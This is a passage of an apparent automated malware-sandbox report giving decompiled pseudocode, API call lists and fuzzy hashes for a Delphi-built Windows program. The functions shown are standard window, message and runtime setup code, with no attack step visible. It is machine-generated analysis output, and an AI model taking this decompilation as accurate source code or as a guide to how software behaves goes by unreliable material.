                                  						}
                                  						_t21 = E0044D894(_t50);
                                  						if(_t21 == 0) {
                                  							goto L28;
                                  						}
                                  						_push( *((intOrPtr*)(_t68 + 8)));
                                  						_push( *((intOrPtr*)(_t68 + 4)));
                                  						_push( *_t68);
                                  						_t32 = E0044D590(_t50);
                                  						_push(_t32);
                                  						L0040703C();
                                  						return _t32;
                                  					}
                                  					goto L27;
                                  				}
                                  				if(_t69 == 0) {
                                  					_t21 = E00448008(__eax, __edx);
                                  					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
                                  						goto L28;
                                  					}
                                  					E00407588( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
                                  					E00446888(_t50,  &_v28,  &_v20);
                                  					_t21 = E0044AE7C(_t50, 0,  &_v28, _t65, 0);
                                  					if(_t21 == 0) {
                                  						goto L28;
                                  					}
                                  					 *((intOrPtr*)(_t68 + 0xc)) = 1;
                                  					return _t21;
                                  				}
                                  				_t39 = _t17 - 7;
                                  				if(_t39 == 0) {
                                  					_t66 = E0045E640(__eax);
                                  					if(_t66 == 0) {
                                  						goto L27;
                                  					}
                                  					_t21 =  *((intOrPtr*)( *_t66 + 0xe8))();
                                  					if(_t21 == 0) {
                                  						goto L28;
                                  					}
                                  					goto L27;
                                  				}
                                  				_t21 = _t39 - 1;
                                  				if(_t21 == 0) {
                                  					if(( *(__eax + 0x54) & 0x00000020) != 0) {
                                  						goto L28;
                                  					}
                                  				} else {
                                  					if(_t21 == 0x17) {
                                  						_t45 = E0044D590(__eax);
                                  						if(_t45 == GetCapture() &&  *0x4a0da8 != 0) {
                                  							_t47 =  *0x4a0da8; // 0x0
                                  							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
                                  								_t48 =  *0x4a0da8; // 0x0
                                  								E00447F3C(_t48, 0, 0x1f, 0);
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Capture
                                  • String ID:
                                  • API String ID: 1145282425-3916222277
                                  • Opcode ID: f674447b006fd8a9af223261cda06af40523fc1caccc54c959f335bd62c4f678
                                  • Instruction ID: c4dc3370344b3c30aa3d07022b194b45a34ec8b63cecf96f84074e2b32ecc106
                                  • Opcode Fuzzy Hash: f674447b006fd8a9af223261cda06af40523fc1caccc54c959f335bd62c4f678
                                  • Instruction Fuzzy Hash: A231B0317046044BF720AA3E8C8972B6395DB45359F14893FB866CB786DB7CDC0A878E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E00452658(void* __ecx, void* __edi, void* __esi) {
                                  				intOrPtr _t6;
                                  				intOrPtr _t8;
                                  				intOrPtr _t10;
                                  				intOrPtr _t12;
                                  				intOrPtr _t14;
                                  				void* _t16;
                                  				void* _t17;
                                  				intOrPtr _t20;
                                  				intOrPtr _t21;
                                  				intOrPtr _t22;
                                  				intOrPtr _t23;
                                  				intOrPtr _t28;
                                  
                                  				_t25 = __esi;
                                  				_t17 = __ecx;
                                  				_push(_t28);
                                  				_push(0x4526de);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t28;
                                  				 *0x4bcae4 =  *0x4bcae4 - 1;
                                  				if( *0x4bcae4 < 0) {
                                  					 *0x4bcae0 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
                                  					_t31 =  *0x4bcae0;
                                  					E00452408(_t16, __edi,  *0x4bcae0);
                                  					_t6 =  *0x442540; // 0x44258c
                                  					E0041BE54(_t6, _t16, _t17,  *0x4bcae0);
                                  					_t8 =  *0x442540; // 0x44258c
                                  					E0041BEF4(_t8, _t16, _t17, _t31);
                                  					_t21 =  *0x442540; // 0x44258c
                                  					_t10 =  *0x45422c; // 0x454278
                                  					E0041BEA0(_t10, _t16, _t21, __esi, _t31);
                                  					_t22 =  *0x442540; // 0x44258c
                                  					_t12 =  *0x4526e8; // 0x452734
                                  					E0041BEA0(_t12, _t16, _t22, __esi, _t31);
                                  					_t23 =  *0x442540; // 0x44258c
                                  					_t14 =  *0x4528a4; // 0x4528f0
                                  					E0041BEA0(_t14, _t16, _t23, _t25, _t31);
                                  				}
                                  				_pop(_t20);
                                  				 *[fs:eax] = _t20;
                                  				_push(0x4526e5);
                                  				return 0;
                                  			}

                                  APIs
                                  • GetVersion.KERNEL32(00000000,004526DE), ref: 00452672
                                    • Part of subcall function 00452408: GetCurrentProcessId.KERNEL32(?,00000000,00452580), ref: 00452429
                                    • Part of subcall function 00452408: GlobalAddAtomA.KERNEL32(00000000), ref: 0045245C
                                    • Part of subcall function 00452408: GetCurrentThreadId.KERNEL32(?,?,00000000,00452580), ref: 00452477
                                    • Part of subcall function 00452408: GlobalAddAtomA.KERNEL32(00000000), ref: 004524AD
                                    • Part of subcall function 00452408: RegisterClipboardFormatA.USER32(00000000), ref: 004524C3
                                    • Part of subcall function 00452408: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,00452580), ref: 00452547
                                    • Part of subcall function 00452408: GetProcAddress.KERNEL32(00000000,AnimateWindow,USER32,00000000,00000000,?,?,00000000,00452580), ref: 00452558
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                  • String ID: 4'E$xBE
                                  • API String ID: 3775504709-4205913489
                                  • Opcode ID: 12efc93e9b21b8e35c556fd00cf65345ec7fc700878ff34973378f1e67702ea8
                                  • Instruction ID: d1c3aeb92f52ac606252676ce40117df8e9a2d2cb7a6564c822f0edb9cc7a0cc
                                  • Opcode Fuzzy Hash: 12efc93e9b21b8e35c556fd00cf65345ec7fc700878ff34973378f1e67702ea8
                                  • Instruction Fuzzy Hash: 4CF03C38214744ABC704EB26EE92A5A77A9E74A3053E04537F90087633DBB8AC458A8C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00448008(intOrPtr* __eax, signed int* __edx) {
                                  				signed int _v12;
                                  				short _v14;
                                  				char _v16;
                                  				signed int _v20;
                                  				intOrPtr* _v24;
                                  				char _v280;
                                  				signed int _t39;
                                  				signed int _t40;
                                  				signed int _t46;
                                  				intOrPtr* _t47;
                                  				signed int _t50;
                                  				signed int _t53;
                                  				intOrPtr _t55;
                                  				intOrPtr _t56;
                                  				signed int _t67;
                                  				signed int _t68;
                                  				void* _t73;
                                  				signed int* _t79;
                                  				intOrPtr _t90;
                                  				intOrPtr* _t96;
                                  
                                  				_t79 = __edx;
                                  				_t96 = __eax;
                                  				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
                                  					L4:
                                  					_t39 =  *_t79;
                                  					if(_t39 < 0x100 || _t39 > 0x108) {
                                  						_t40 =  *_t79;
                                  						__eflags = _t40 - 0x200;
                                  						if(_t40 < 0x200) {
                                  							L30:
                                  							__eflags = _t40 - 0xb00b;
                                  							if(_t40 == 0xb00b) {
                                  								E004468E4(_t96, _t79[1], _t40, _t79[2]);
                                  							}
                                  							L32:
                                  							return  *((intOrPtr*)( *_t96 - 0x14))();
                                  						}
                                  						__eflags = _t40 - 0x20a;
                                  						if(_t40 > 0x20a) {
                                  							goto L30;
                                  						}
                                  						__eflags =  *(_t96 + 0x50) & 0x00000080;
                                  						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
                                  							L16:
                                  							_t46 =  *_t79 - 0x200;
                                  							__eflags = _t46;
                                  							if(__eflags == 0) {
                                  								L21:
                                  								_t47 =  *0x4bb048; // 0x4bcb7c
                                  								E00467FC4( *_t47, _t79, _t96, __eflags);
                                  								goto L32;
                                  							}
                                  							_t50 = _t46 - 1;
                                  							__eflags = _t50;
                                  							if(_t50 == 0) {
                                  								L22:
                                  								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
                                  								if(__eflags != 0) {
                                  									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
                                  									goto L32;
                                  								}
                                  								return E00403814(_t96, __eflags);
                                  							}
                                  							_t53 = _t50 - 1;
                                  							__eflags = _t53;
                                  							if(_t53 == 0) {
                                  								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
                                  								goto L32;
                                  							}
                                  							__eflags = _t53 == 1;
                                  							if(_t53 == 1) {
                                  								goto L22;
                                  							}
                                  							_t55 =  *0x4bcadc; // 0x1c40e64
                                  							__eflags =  *((char*)(_t55 + 0x20));
                                  							if( *((char*)(_t55 + 0x20)) == 0) {
                                  								goto L32;
                                  							} else {
                                  								_t56 =  *0x4bcadc; // 0x1c40e64
                                  								__eflags =  *(_t56 + 0x1c);
                                  								if( *(_t56 + 0x1c) == 0) {
                                  									goto L32;
                                  								}
                                  								_t90 =  *0x4bcadc; // 0x1c40e64
                                  								__eflags =  *_t79 -  *((intOrPtr*)(_t90 + 0x1c));
                                  								if( *_t79 !=  *((intOrPtr*)(_t90 + 0x1c))) {
                                  									goto L32;
                                  								}
                                  								GetKeyboardState( &_v280);
                                  								_v20 =  *_t79;
                                  								_v16 = E0045E564( &_v280);
                                  								_v14 = _t79[1];
                                  								_v12 = _t79[2];
                                  								return E00403814(_t96, __eflags);
                                  							}
                                  							goto L21;
                                  						}
                                  						_t67 = _t40 - 0x203;
                                  						__eflags = _t67;
                                  						if(_t67 == 0) {
                                  							L15:
                                  							 *_t79 =  *_t79 - 2;
                                  							__eflags =  *_t79;
                                  							goto L16;
                                  						}
                                  						_t68 = _t67 - 3;
                                  						__eflags = _t68;
                                  						if(_t68 == 0) {
                                  							goto L15;
                                  						}
                                  						__eflags = _t68 != 3;
                                  						if(_t68 != 3) {
                                  							goto L16;
                                  						}
                                  						goto L15;
                                  					}
                                  					_v24 = E0045E640(_t96);
                                  					if(_v24 == 0) {
                                  						goto L32;
                                  					}
                                  					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
                                  					if(_t73 == 0) {
                                  						goto L32;
                                  					}
                                  				} else {
                                  					_v24 = E0045E640(__eax);
                                  					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
                                  						goto L4;
                                  					} else {
                                  						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
                                  						if(_t73 == 0) {
                                  							goto L4;
                                  						}
                                  					}
                                  				}
                                  				return _t73;
                                  			}
                                  0x0044804e
                                  0x00000000
                                  0x00000000
                                  0x0044804e
                                  0x0044802c
                                  0x00448199

                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 0044813D
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: KeyboardState
                                  • String ID:
                                  • API String ID: 1724228437-0
                                  • Opcode ID: 83d6fb8417ee5df20fac9c9e48d5e425b0a9465d4f21e6aff5de0fd420e2d9a6
                                  • Instruction ID: 23351c957653fd85c00bce8afb9faa080636c556465c822262597cf546ea43ee
                                  • Opcode Fuzzy Hash: 83d6fb8417ee5df20fac9c9e48d5e425b0a9465d4f21e6aff5de0fd420e2d9a6
                                  • Instruction Fuzzy Hash: 43419131A10A59CBEB24DF29C5887AE77A0EF45304F1841AFD404D7395CB78DD8ACB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E0041C244(void* __eax, struct HINSTANCE__* __edx) {
                                  				intOrPtr _v8;
                                  				void* __ebx;
                                  				void* __ecx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t10;
                                  				intOrPtr _t15;
                                  				struct HINSTANCE__* _t20;
                                  				intOrPtr* _t22;
                                  				intOrPtr _t30;
                                  				void* _t32;
                                  				intOrPtr* _t35;
                                  				intOrPtr _t38;
                                  				intOrPtr _t40;
                                  
                                  				_t38 = _t40;
                                  				_push(_t22);
                                  				_t35 = _t22;
                                  				_t20 = __edx;
                                  				_t32 = __eax;
                                  				if(__edx == 0) {
                                  					_t20 =  *0x4bc668; // 0x400000
                                  				}
                                  				_t10 = FindResourceA(_t20, E00404898(_t32), 0xa) & 0xffffff00 | _t9 != 0x00000000;
                                  				_t43 = _t10;
                                  				if(_t10 == 0) {
                                  					return _t10;
                                  				} else {
                                  					_v8 = E0041F904(_t20, 1, 0xa, _t32);
                                  					_push(_t38);
                                  					_push(0x41c2b8);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t40;
                                  					_t15 = E0041F264(_v8, _t20,  *_t35, _t32, _t35, _t43); // executed
                                  					 *_t35 = _t15;
                                  					_pop(_t30);
                                  					 *[fs:eax] = _t30;
                                  					_push(E0041C2BF);
                                  					return E0040360C(_v8);
                                  				}
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: FindResource
                                  • String ID:
                                  • API String ID: 1635176832-0
                                  • Opcode ID: 7bfbe446d2d84500afd1fadd4ddbe064e00040a78e4814cbe6764901e3a11311
                                  • Instruction ID: 8f4a0249fe31a095edc46022bcc5edd5554435d2a617b7370035fc5565dbad6a
                                  • Opcode Fuzzy Hash: 7bfbe446d2d84500afd1fadd4ddbe064e00040a78e4814cbe6764901e3a11311
                                  • Instruction Fuzzy Hash: 6801F771344300AFD710EFAADCC2EAAB7DDDB8971472144BBF90497341DA7A9C419618
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E00466610(intOrPtr _a4) {
                                  				intOrPtr _t26;
                                  
                                  				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
                                  				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
                                  				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
                                  				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
                                  				_push(_t26); // executed
                                  				L0040703C(); // executed
                                  				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
                                  				return _t26;
                                  			}

                                  APIs
                                  • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0046663A
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: NtdllProc_Window
                                  • String ID:
                                  • API String ID: 4255912815-0
                                  • Opcode ID: 91ca66a9679377342874cd30426f3a04ba6fd3dd0fed8150f316d0d28609db02
                                  • Instruction ID: e01f34afe475e9cab5e137cf35324e53cded2bf6606f3e9f2aeda5279b241760
                                  • Opcode Fuzzy Hash: 91ca66a9679377342874cd30426f3a04ba6fd3dd0fed8150f316d0d28609db02
                                  • Instruction Fuzzy Hash: B1F0C579605608AFDB40DF9DC588D4AFBE8BB4C260B458295B988CB321C234FD818F94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: ExitFreeHandleLibraryModuleProcess
                                  • String ID: HI
                                  • API String ID: 3233083275-2966693143
                                  • Opcode ID: 62e1f0283fa6afb04e926ccf4dc0f5f49e4a19d43571b2a030579f40154512e8
                                  • Instruction ID: 8ed9c937d12703e5ceca14373ca5036638f973053a73cf6211334a43e12a0917
                                  • Opcode Fuzzy Hash: 62e1f0283fa6afb04e926ccf4dc0f5f49e4a19d43571b2a030579f40154512e8
                                  • Instruction Fuzzy Hash: 1551475018E3C20FC3139B749C74495BFB0AE1321632D46EFD8C18B2A3D65CA89AD76B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 42%
                                  			E00466118(void* __eax, void* __ebx, void* __ecx) {
                                  				struct _WNDCLASSA _v44;
                                  				char _v48;
                                  				char* _t22;
                                  				long _t23;
                                  				CHAR* _t26;
                                  				struct HINSTANCE__* _t27;
                                  				intOrPtr* _t29;
                                  				signed int _t32;
                                  				intOrPtr* _t33;
                                  				signed int _t36;
                                  				struct HINSTANCE__* _t37;
                                  				void* _t39;
                                  				CHAR* _t40;
                                  				struct HWND__* _t41;
                                  				char* _t47;
                                  				char* _t52;
                                  				long _t55;
                                  				long _t59;
                                  				struct HINSTANCE__* _t62;
                                  				intOrPtr _t64;
                                  				void* _t69;
                                  				struct HMENU__* _t70;
                                  				void* _t71;
                                  				intOrPtr _t77;
                                  				void* _t83;
                                  				short _t88;
                                  
                                  				_t71 = __ecx;
                                  				_v48 = 0;
                                  				_t69 = __eax;
                                  				_push(_t83);
                                  				_push(0x4662b9);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t83 + 0xffffffd4;
                                  				if( *((char*)(__eax + 0xa4)) != 0) {
                                  					L13:
                                  					_pop(_t77);
                                  					 *[fs:eax] = _t77;
                                  					_push(0x4662c0);
                                  					return E004043D8( &_v48);
                                  				}
                                  				_t22 =  *0x4bb0d8; // 0x4bc04c
                                  				if( *_t22 != 0) {
                                  					goto L13;
                                  				}
                                  				_t23 = E00426074(E00466698, __eax); // executed
                                  				 *(_t69 + 0x40) = _t23;
                                  				 *0x4a1028 = L0040703C;
                                  				_t26 =  *0x4a1048; // 0x465dec
                                  				_t27 =  *0x4bc668; // 0x400000
                                  				if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
                                  					_t62 =  *0x4bc668; // 0x400000
                                  					 *0x4a1034 = _t62;
                                  					_t88 = RegisterClassA(0x4a1024);
                                  					if(_t88 == 0) {
                                  						_t64 =  *0x4bad60; // 0x42640c
                                  						E0040656C(_t64, _t71,  &_v48);
                                  						E0040CAC4(_v48, 1);
                                  						E00403DEC();
                                  					}
                                  				}
                                  				_t29 =  *0x4bae68; // 0x4bc904
                                  				_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
                                  				if(_t88 < 0) {
                                  					asm("adc eax, 0x0");
                                  				}
                                  				_t33 =  *0x4bae68; // 0x4bc904
                                  				_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
                                  				if(_t88 < 0) {
                                  					asm("adc eax, 0x0");
                                  				}
                                  				_push(_t36);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_t37 =  *0x4bc668; // 0x400000
                                  				_push(_t37);
                                  				_push(0);
                                  				_t7 = _t69 + 0x8c; // 0xafcc0045
                                  				_t39 = E00404898( *_t7);
                                  				_t40 =  *0x4a1048; // 0x465dec, executed
                                  				_t41 = E00407624(_t40, _t39); // executed
                                  				 *(_t69 + 0x30) = _t41;
                                  				_t9 = _t69 + 0x8c; // 0x45e140
                                  				E004043D8(_t9);
                                  				 *((char*)(_t69 + 0xa4)) = 1;
                                  				_t11 = _t69 + 0x40; // 0x10e80000
                                  				_t12 = _t69 + 0x30; // 0xe
                                  				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
                                  				_t47 =  *0x4baf14; // 0x4bcae0
                                  				if( *_t47 != 0) {
                                  					_t55 = E00466D98(_t69);
                                  					_t13 = _t69 + 0x30; // 0xe
                                  					SendMessageA( *_t13, 0x80, 1, _t55); // executed
                                  					_t59 = E00466D98(_t69);
                                  					_t14 = _t69 + 0x30; // 0xe
                                  					SetClassLongA( *_t14, 0xfffffff2, _t59); // executed
                                  				}
                                  				_t15 = _t69 + 0x30; // 0xe
                                  				_t70 = GetSystemMenu( *_t15, "true");
                                  				DeleteMenu(_t70, 0xf030, 0);
                                  				DeleteMenu(_t70, 0xf000, 0);
                                  				_t52 =  *0x4baf14; // 0x4bcae0
                                  				if( *_t52 != 0) {
                                  					DeleteMenu(_t70, 0xf010, 0);
                                  				}
                                  				goto L13;
                                  			}

                                  APIs
                                    • Part of subcall function 00426074: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0042609B
                                  • GetClassInfoA.USER32(00400000,00465DEC,?), ref: 00466177
                                  • RegisterClassA.USER32(004A1024), ref: 0046618F
                                    • Part of subcall function 0040656C: LoadStringA.USER32 ref: 0040659E
                                  • SetWindowLongA.USER32 ref: 0046622B
                                  • SendMessageA.USER32 ref: 0046624D
                                  • SetClassLongA.USER32(0000000E,000000F2,00000000), ref: 00466260
                                  • GetSystemMenu.USER32 ref: 0046626B
                                  • DeleteMenu.USER32 ref: 0046627A
                                  • DeleteMenu.USER32 ref: 00466287
                                  • DeleteMenu.USER32 ref: 0046629E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                  • String ID: <p@$]F
                                  • API String ID: 2103932818-3906150556
                                  • Opcode ID: 110c0c2f661ac4536de843507b76315c96f7d1763f6c5fbcd27b836a60ffbd7e
                                  • Instruction ID: c1e0582a264028a61f34acac365863a1439996b032cb5265ab521e5461c5710b
                                  • Opcode Fuzzy Hash: 110c0c2f661ac4536de843507b76315c96f7d1763f6c5fbcd27b836a60ffbd7e
                                  • Instruction Fuzzy Hash: DE414271B443406FE710EB69DC82FAA37A8AB45704F055576FA00EF2E2D6B9AC40872D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E00452408(void* __ebx, void* __edi, void* __eflags) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				long _v28;
                                  				char _v32;
                                  				char _v36;
                                  				intOrPtr _t25;
                                  				short _t27;
                                  				char _t29;
                                  				intOrPtr _t35;
                                  				short _t37;
                                  				intOrPtr _t38;
                                  				intOrPtr _t47;
                                  				intOrPtr _t49;
                                  				intOrPtr* _t50;
                                  				intOrPtr _t53;
                                  				struct HINSTANCE__* _t63;
                                  				intOrPtr* _t78;
                                  				intOrPtr* _t80;
                                  				intOrPtr _t83;
                                  				void* _t87;
                                  
                                  				_v20 = 0;
                                  				_v8 = 0;
                                  				_push(_t87);
                                  				_push(0x452580);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t87 + 0xffffffe0;
                                  				_v16 = GetCurrentProcessId();
                                  				_v12 = 0;
                                  				E00409B8C("Delphi%.8X", 0,  &_v16,  &_v8);
                                  				E0040442C(0x4bcaec, _v8);
                                  				_t25 =  *0x4bcaec; // 0x1c40dec
                                  				_t27 = GlobalAddAtomA(E00404898(_t25)); // executed
                                  				 *0x4bcae8 = _t27;
                                  				_t29 =  *0x4bc668; // 0x400000
                                  				_v36 = _t29;
                                  				_v32 = 0;
                                  				_v28 = GetCurrentThreadId();
                                  				_v24 = 0;
                                  				E00409B8C("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
                                  				E0040442C(0x4bcaf0, _v20);
                                  				_t35 =  *0x4bcaf0; // 0x1c40e08
                                  				_t37 = GlobalAddAtomA(E00404898(_t35)); // executed
                                  				 *0x4bcaea = _t37;
                                  				_t38 =  *0x4bcaf0; // 0x1c40e08
                                  				 *0x4bcaf4 = RegisterClipboardFormatA(E00404898(_t38));
                                  				 *0x4bcb2c = E0041CAC4(1);
                                  				E0045200C();
                                  				 *0x4bcadc = E00451E28(1, 1);
                                  				_t47 = E00464C44(1, __edi);
                                  				_t78 =  *0x4bb224; // 0x4bcb80
                                  				 *_t78 = _t47;
                                  				_t49 = E00465DFC(0, 1);
                                  				_t80 =  *0x4bb048; // 0x4bcb7c
                                  				 *_t80 = _t49;
                                  				_t50 =  *0x4bb048; // 0x4bcb7c
                                  				E00467ACC( *_t50, 1);
                                  				_t53 =  *0x441498; // 0x44149c
                                  				E0041BFE0(_t53, 0x443da8, 0x443db8);
                                  				_t63 = GetModuleHandleA("USER32");
                                  				if(_t63 != 0) {
                                  					 *0x4a0ce4 = GetProcAddress(_t63, "AnimateWindow");
                                  				}
                                  				_pop(_t83);
                                  				 *[fs:eax] = _t83;
                                  				_push(0x452587);
                                  				E004043D8( &_v20);
                                  				return E004043D8( &_v8);
                                  			}

                                  APIs
                                  • GetCurrentProcessId.KERNEL32(?,00000000,00452580), ref: 00452429
                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 0045245C
                                  • GetCurrentThreadId.KERNEL32(?,?,00000000,00452580), ref: 00452477
                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 004524AD
                                  • RegisterClipboardFormatA.USER32(00000000), ref: 004524C3
                                    • Part of subcall function 0041CAC4: RtlInitializeCriticalSection.KERNEL32(0041A008,?,?,0042635D,00000000,00426381), ref: 0041CAE3
                                    • Part of subcall function 0045200C: SetErrorMode.KERNEL32(00008000), ref: 00452025
                                    • Part of subcall function 0045200C: GetModuleHandleA.KERNEL32(USER32,00000000,00452172,?,00008000), ref: 00452049
                                    • Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME,USER32,00000000,00452172,?,00008000), ref: 00452056
                                    • Part of subcall function 0045200C: LoadLibraryA.KERNEL32(imm32.dll), ref: 00452072
                                    • Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,ImmGetContext,imm32.dll,00000000,00452172,?,00008000), ref: 00452094
                                    • Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00452172,?,00008000), ref: 004520A9
                                    • Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00452172,?,00008000), ref: 004520BE
                                    • Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00452172,?,00008000), ref: 004520D3
